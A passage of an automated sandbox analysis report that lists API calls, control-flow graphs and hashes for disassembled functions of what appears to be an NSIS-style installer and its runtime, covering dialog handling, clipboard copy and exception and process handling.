                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                                    • Opcode ID: 5e27906ea42b1cb2df4d2733db0e217d4f1ce8c20c2e218d589f399583b2051f
                                                                                                                                                                                    • Instruction ID: a9cd128aefada58db544c913f37af02a83ad52051cfd27b7eb5f7cc55603c7a9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e27906ea42b1cb2df4d2733db0e217d4f1ce8c20c2e218d589f399583b2051f
                                                                                                                                                                                    • Instruction Fuzzy Hash: C531D37491121C9BCF21DF24D988BDDBBB9EF08310F9041EAE91CAB260E7709B918F45
                                                                                                                                                                                    Function 367B4AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,367B4A8A,?,367C2238,0000000C,367B4BBD,00000000,00000000,00000001,367B2082,367C2108,0000000C,367B1F3A,?), ref: 367B4AD5
                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,367B4A8A,?,367C2238,0000000C,367B4BBD,00000000,00000000,00000001,367B2082,367C2108,0000000C,367B1F3A,?), ref: 367B4ADC
                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 367B4AEE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                    • Opcode ID: 6340c1bf9466f0885597779416af62fe1dd4007accd9cacee55fc5769d62edb8
                                                                                                                                                                                    • Instruction ID: 49a35aa8d7e947d5e5293fc36799059fcd61e6845346ca7f978b190cbe504780
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6340c1bf9466f0885597779416af62fe1dd4007accd9cacee55fc5769d62edb8
                                                                                                                                                                                    • Instruction Fuzzy Hash: C6E0B63A520208AFCF016F65CD18E593B6BEF44381BA04024FB05DB529DB35D953CA69
                                                                                                                                                                                    Function 367B2933 Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 367B294C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2325560087-0
                                                                                                                                                                                    • Opcode ID: e03f0b9a8b6f3be0f0fbe8c8749f6a3476a9026383d17b1d37d0c63a71618bc5
                                                                                                                                                                                    • Instruction ID: 54f7d2b0c320e83a6da463df59ea223658a1a68f33eecd9c58d944f714ad3492
                                                                                                                                                                                    • Opcode Fuzzy Hash: e03f0b9a8b6f3be0f0fbe8c8749f6a3476a9026383d17b1d37d0c63a71618bc5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 03417FB1D222049BEB10CF55C5C16AABBF6FF48310FA4856AD915FB354D3789A41CFA0
                                                                                                                                                                                    Function 367B724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HeapProcess
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 54951025-0
                                                                                                                                                                                    • Opcode ID: 3415cc72deed2181cee0608b13cda678370153c9f0231b0264e3578e35451fa0
                                                                                                                                                                                    • Instruction ID: f0ec0746120019b03bcee6f0c13b160c4d277fe21ab7e96025c36e8102860491
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3415cc72deed2181cee0608b13cda678370153c9f0231b0264e3578e35451fa0
                                                                                                                                                                                    • Instruction Fuzzy Hash: F2A011302002038F83008E30828A28C3AAEAA002A03800028AA08E2000EB2880028A00
                                                                                                                                                                                    Function 004051CA Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 395 4051ca-4051e6 396 405375-40537b 395->396 397 4051ec-4052b3 GetDlgItem * 3 call 40405b call 40492a GetClientRect GetSystemMetrics SendMessageA * 2 395->397 399 4053a5-4053b1 396->399 400 40537d-40539f GetDlgItem CreateThread CloseHandle 396->400 419 4052d1-4052d4 397->419 420 4052b5-4052cf SendMessageA * 2 397->420 402 4053d3-4053d9 399->402 403 4053b3-4053b9 399->403 400->399 404 4053db-4053e1 402->404 405 40542e-405431 402->405 407 4053f4-4053fb call 40408d 403->407 408 4053bb-4053ce ShowWindow * 2 call 40405b 403->408 409 4053e3-4053ef call 403fff 404->409 410 405407-405417 ShowWindow 404->410 405->407 413 405433-405439 405->413 416 405400-405404 407->416 408->402 409->407 417 405427-405429 call 403fff 410->417 418 405419-405422 call 40508c 410->418 413->407 421 40543b-40544e SendMessageA 413->421 417->405 418->417 424 4052e4-4052fb call 404026 419->424 425 4052d6-4052e2 SendMessageA 419->425 420->419 426 405454-405480 CreatePopupMenu call 405f87 AppendMenuA 421->426 427 40554b-40554d 421->427 434 405331-405352 GetDlgItem SendMessageA 424->434 435 4052fd-405311 ShowWindow 424->435 425->424 432 405482-405492 GetWindowRect 426->432 433 405495-4054ab TrackPopupMenu 426->433 427->416 432->433 433->427 436 4054b1-4054cb 433->436 434->427 439 405358-405370 SendMessageA * 2 434->439 437 405320 435->437 438 405313-40531e ShowWindow 435->438 440 4054d0-4054eb SendMessageA 436->440 441 405326-40532c call 40405b 437->441 438->441 439->427 440->440 442 4054ed-40550d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 440->442 441->434 444 40550f-40552f SendMessageA 442->444 444->444 445 405531-405545 GlobalUnlock SetClipboardData CloseClipboard 444->445 445->427
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 00405229
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00405238
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00405275
                                                                                                                                                                                    • GetSystemMetrics.USER32(?), ref: 0040527C
                                                                                                                                                                                    • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040529D
                                                                                                                                                                                    • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052AE
                                                                                                                                                                                    • SendMessageA.USER32(?,00001001,00000000,?), ref: 004052C1
                                                                                                                                                                                    • SendMessageA.USER32(?,00001026,00000000,?), ref: 004052CF
                                                                                                                                                                                    • SendMessageA.USER32(?,00001024,00000000,?), ref: 004052E2
                                                                                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405304
                                                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405339
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405349
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405362
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040536E
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 00405247
                                                                                                                                                                                      • Part of subcall function 0040405B: SendMessageA.USER32(00000028,?,00000001,00403E8B), ref: 00404069
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040538A
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000515E,00000000), ref: 00405398
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040539F
                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 004053C2
                                                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 004053C9
                                                                                                                                                                                    • ShowWindow.USER32(00000008), ref: 0040540F
                                                                                                                                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405443
                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00405454
                                                                                                                                                                                    • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405469
                                                                                                                                                                                    • GetWindowRect.USER32(?,000000FF), ref: 00405489
                                                                                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054A2
                                                                                                                                                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054DE
                                                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 004054EE
                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 004054F4
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,?), ref: 004054FD
                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405507
                                                                                                                                                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040551B
                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405534
                                                                                                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 0040553F
                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00405545
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 590372296-0
                                                                                                                                                                                    • Opcode ID: d5273281f7ca55948d0d67e565d88e3eec44a4adc77553a27c5bfa0cd5b41917
                                                                                                                                                                                    • Instruction ID: ba98567820032f63b871bd6861c5d6e43a3521a54ecc658c1b1e5281d96d67ec
                                                                                                                                                                                    • Opcode Fuzzy Hash: d5273281f7ca55948d0d67e565d88e3eec44a4adc77553a27c5bfa0cd5b41917
                                                                                                                                                                                    • Instruction Fuzzy Hash: D6A14971900608BFDF11AF61DE89AAF7F79EB04354F40403AFA41B61A0CB755E519F68
                                                                                                                                                                                    Function 00403B52 Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 446 403b52-403b64 447 403ca5-403cb4 446->447 448 403b6a-403b70 446->448 450 403d03-403d18 447->450 451 403cb6-403cfe GetDlgItem * 2 call 404026 SetClassLongA call 40140b 447->451 448->447 449 403b76-403b7f 448->449 452 403b81-403b8e SetWindowPos 449->452 453 403b94-403b97 449->453 455 403d58-403d5d call 404072 450->455 456 403d1a-403d1d 450->456 451->450 452->453 458 403bb1-403bb7 453->458 459 403b99-403bab ShowWindow 453->459 463 403d62-403d7d 455->463 461 403d50-403d52 456->461 462 403d1f-403d2a call 401389 456->462 464 403bd3-403bd6 458->464 465 403bb9-403bce DestroyWindow 458->465 459->458 461->455 468 403ff3 461->468 462->461 483 403d2c-403d4b SendMessageA 462->483 469 403d86-403d8c 463->469 470 403d7f-403d81 call 40140b 463->470 474 403bd8-403be4 SetWindowLongA 464->474 475 403be9-403bef 464->475 471 403fd0-403fd6 465->471 473 403ff5-403ffc 468->473 479 403fb1-403fca DestroyWindow EndDialog 469->479 480 403d92-403d9d 469->480 470->469 471->468 478 403fd8-403fde 471->478 474->473 481 403c92-403ca0 call 40408d 475->481 482 403bf5-403c06 GetDlgItem 475->482 478->468 485 403fe0-403fe9 ShowWindow 478->485 479->471 480->479 486 403da3-403df0 call 405f87 call 404026 * 3 GetDlgItem 480->486 481->473 487 403c25-403c28 482->487 488 403c08-403c1f SendMessageA IsWindowEnabled 482->488 483->473 485->468 516 403df2-403df7 486->516 517 403dfa-403e36 ShowWindow EnableWindow call 404048 EnableWindow 486->517 491 403c2a-403c2b 487->491 492 403c2d-403c30 487->492 488->468 488->487 494 403c5b-403c60 call 403fff 491->494 495 403c32-403c38 492->495 496 403c3e-403c43 492->496 494->481 497 403c79-403c8c SendMessageA 495->497 498 403c3a-403c3c 495->498 496->497 499 403c45-403c4b 496->499 497->481 498->494 502 403c62-403c6b call 40140b 499->502 503 403c4d-403c53 call 40140b 499->503 502->481 513 403c6d-403c77 502->513 512 403c59 503->512 512->494 513->512 516->517 520 403e38-403e39 517->520 521 403e3b 517->521 522 403e3d-403e6b GetSystemMenu EnableMenuItem SendMessageA 520->522 521->522 523 403e80 522->523 524 403e6d-403e7e SendMessageA 522->524 525 403e86-403ec0 call 40405b call 403b33 call 405f65 lstrlenA call 405f87 SetWindowTextA call 401389 523->525 524->525 525->463 536 403ec6-403ec8 525->536 536->463 537 403ece-403ed2 536->537 538 403ef1-403f05 DestroyWindow 537->538 539 403ed4-403eda 537->539 538->471 541 403f0b-403f38 CreateDialogParamA 538->541 539->468 540 403ee0-403ee6 539->540 540->463 542 403eec 540->542 541->471 543 403f3e-403f95 call 404026 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 541->543 542->468 543->468 548 403f97-403faf ShowWindow call 404072 543->548 548->471
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B8E
                                                                                                                                                                                    • ShowWindow.USER32(?), ref: 00403BAB
                                                                                                                                                                                    • DestroyWindow.USER32 ref: 00403BBF
                                                                                                                                                                                    • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BDB
                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00403BFC
                                                                                                                                                                                    • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C10
                                                                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403C17
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00403CC5
                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00403CCF
                                                                                                                                                                                    • SetClassLongA.USER32(?,000000F2,?), ref: 00403CE9
                                                                                                                                                                                    • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D3A
                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00403DE0
                                                                                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00403E01
                                                                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00403E13
                                                                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00403E2E
                                                                                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E44
                                                                                                                                                                                    • EnableMenuItem.USER32(00000000), ref: 00403E4B
                                                                                                                                                                                    • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E63
                                                                                                                                                                                    • SendMessageA.USER32(?,00000401,?,00000000), ref: 00403E76
                                                                                                                                                                                    • lstrlenA.KERNEL32(0042A870,?,0042A870,00000000), ref: 00403EA0
                                                                                                                                                                                    • SetWindowTextA.USER32(?,0042A870), ref: 00403EAF
                                                                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00403FE3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 184305955-0
                                                                                                                                                                                    • Opcode ID: 73a332412999680b2dcb521756cc8655f7b5c6597c26b8181da5b9882737dc52
                                                                                                                                                                                    • Instruction ID: 825bbfaa6b66e15a56cde4951677423d70b10f791e0768be12abaf391e468a8e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 73a332412999680b2dcb521756cc8655f7b5c6597c26b8181da5b9882737dc52
                                                                                                                                                                                    • Instruction Fuzzy Hash: 80C19F71604205AFDB206F22EE45E2B3EBCFB4570AF40053EFA42B11E1CB7999429B1D
                                                                                                                                                                                    Function 004037B5 Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 215stringregistryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 551 4037b5-4037cd call 4062fd 554 4037e1-403812 call 405e4c 551->554 555 4037cf-4037df call 405ec3 551->555 560 403814-403825 call 405e4c 554->560 561 40382a-403830 lstrcatA 554->561 564 403835-40385e call 403a7a call 4059eb 555->564 560->561 561->564 569 403864-403869 564->569 570 4038e5-4038ed call 4059eb 564->570 569->570 571 40386b-40388f call 405e4c 569->571 576 4038fb-403920 LoadImageA 570->576 577 4038ef-4038f6 call 405f87 570->577 571->570 578 403891-403893 571->578 580 4039a1-4039a9 call 40140b 576->580 581 403922-403952 RegisterClassA 576->581 577->576 582 4038a4-4038b0 lstrlenA 578->582 583 403895-4038a2 call 405928 578->583 592 4039b3-4039be call 403a7a 580->592 593 4039ab-4039ae 580->593 584 403a70 581->584 585 403958-40399c SystemParametersInfoA CreateWindowExA 581->585 589 4038b2-4038c0 lstrcmpiA 582->589 590 4038d8-4038e0 call 4058fd call 405f65 582->590 583->582 588 403a72-403a79 584->588 585->580 589->590 596 4038c2-4038cc GetFileAttributesA 589->596 590->570 604 4039c4-4039de ShowWindow call 40628f 592->604 605 403a47-403a4f call 40515e 592->605 593->588 599 4038d2-4038d3 call 405944 596->599 600 4038ce-4038d0 596->600 599->590 600->590 600->599 612 4039e0-4039e5 call 40628f 604->612 613 4039ea-4039fc GetClassInfoA 604->613 610 403a51-403a57 605->610 611 403a69-403a6b call 40140b 605->611 610->593 614 403a5d-403a64 call 40140b 610->614 611->584 612->613 617 403a14-403a45 DialogBoxParamA call 40140b call 403705 613->617 618 4039fe-403a0e GetClassInfoA RegisterClassA 613->618 614->593 617->588 618->617
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004062FD: GetModuleHandleA.KERNEL32(?,?,?,00403264,0000000A), ref: 0040630F
                                                                                                                                                                                      • Part of subcall function 004062FD: GetProcAddress.KERNEL32(00000000,?), ref: 0040632A
                                                                                                                                                                                    • lstrcatA.KERNEL32(00436000,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,?,761F3410,00436400,00435000,00000000), ref: 00403830
                                                                                                                                                                                    • lstrlenA.KERNEL32(0042E3A0,?,?,?,0042E3A0,00000000,00435400,00436000,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,?,761F3410), ref: 004038A5
                                                                                                                                                                                    • lstrcmpiA.KERNEL32(?,.exe), ref: 004038B8
                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0042E3A0), ref: 004038C3
                                                                                                                                                                                    • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00435400), ref: 0040390C
                                                                                                                                                                                      • Part of subcall function 00405EC3: wsprintfA.USER32 ref: 00405ED0
                                                                                                                                                                                    • RegisterClassA.USER32(0042EBA0), ref: 00403949
                                                                                                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403961
                                                                                                                                                                                    • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403996
                                                                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 004039CC
                                                                                                                                                                                    • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBA0), ref: 004039F8
                                                                                                                                                                                    • GetClassInfoA.USER32(00000000,RichEdit,0042EBA0), ref: 00403A05
                                                                                                                                                                                    • RegisterClassA.USER32(0042EBA0), ref: 00403A0E
                                                                                                                                                                                    • DialogBoxParamA.USER32(?,00000000,00403B52,00000000), ref: 00403A2D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                    • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                    • API String ID: 1975747703-2904746566
                                                                                                                                                                                    • Opcode ID: 7c46e95d15e6a007461aada79675e14bbdf31a6050e9bfd56e3caf825b44128a
                                                                                                                                                                                    • Instruction ID: cf57693f3f88dc886a5042f17341946b18930627488d4c28d640959b633c26bb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c46e95d15e6a007461aada79675e14bbdf31a6050e9bfd56e3caf825b44128a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E61D770240600AED620BB669D45F373EACEB44749F40447EF985B22E2DB7C9D029A2D
                                                                                                                                                                                    Function 0040416F Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 625 40416f-40417f 626 404291-4042a4 625->626 627 404185-40418d 625->627 630 404300-404304 626->630 631 4042a6-4042af 626->631 628 4041a0-404238 call 404026 * 2 CheckDlgButton call 404048 GetDlgItem call 40405b SendMessageA 627->628 629 40418f-40419e 627->629 665 404243-40428c SendMessageA * 2 lstrlenA SendMessageA * 2 628->665 666 40423a-40423d GetSysColor 628->666 629->628 633 4043ca-4043d1 630->633 634 40430a-40431e GetDlgItem 630->634 635 4042b5-4042bd 631->635 636 4043d9 631->636 633->636 639 4043d3 633->639 641 404320-404327 634->641 642 404388-40438f 634->642 635->636 637 4042c3-4042cf 635->637 640 4043dc-4043e3 call 40408d 636->640 637->636 643 4042d5-4042fb GetDlgItem SendMessageA call 404048 call 4043ef 637->643 639->636 650 4043e8-4043ec 640->650 641->642 646 404329-404344 641->646 642->640 647 404391-404398 642->647 643->630 646->642 651 404346-404385 SendMessageA LoadCursorA SetCursor call 404413 LoadCursorA SetCursor 646->651 647->640 652 40439a-40439e 647->652 651->642 656 4043a0-4043af SendMessageA 652->656 657 4043b1-4043b5 652->657 656->657 658 4043c5-4043c8 657->658 659 4043b7-4043c3 SendMessageA 657->659 658->650 659->658 665->650 666->665
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004041FA
                                                                                                                                                                                    • GetDlgItem.USER32(00000000,000003E8), ref: 0040420E
                                                                                                                                                                                    • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040422C
                                                                                                                                                                                    • GetSysColor.USER32(?), ref: 0040423D
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040424C
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040425B
                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0040425E
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040426D
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404282
                                                                                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 004042E4
                                                                                                                                                                                    • SendMessageA.USER32(00000000), ref: 004042E7
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404312
                                                                                                                                                                                    • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404352
                                                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F02), ref: 00404361
                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 0040436A
                                                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 00404380
                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 00404383
                                                                                                                                                                                    • SendMessageA.USER32(00000111,00000001,00000000), ref: 004043AF
                                                                                                                                                                                    • SendMessageA.USER32(00000010,00000000,00000000), ref: 004043C3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                    • String ID: :A@$N
                                                                                                                                                                                    • API String ID: 3103080414-504195219
                                                                                                                                                                                    • Opcode ID: cd245b479e67a0965af24715bd7e729d27bd81987a0dae74a39f742a14bba925
                                                                                                                                                                                    • Instruction ID: 4cc5751811e84191dd39768f0d3a0055f5535ab869bb222e46a2b56927204bf5
                                                                                                                                                                                    • Opcode Fuzzy Hash: cd245b479e67a0965af24715bd7e729d27bd81987a0dae74a39f742a14bba925
                                                                                                                                                                                    • Instruction Fuzzy Hash: DA6183B1A00205BFEB10AF61DD45F6A7B69EB84715F00413AFB05BA1D1C7B8A951CF98
                                                                                                                                                                                    Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
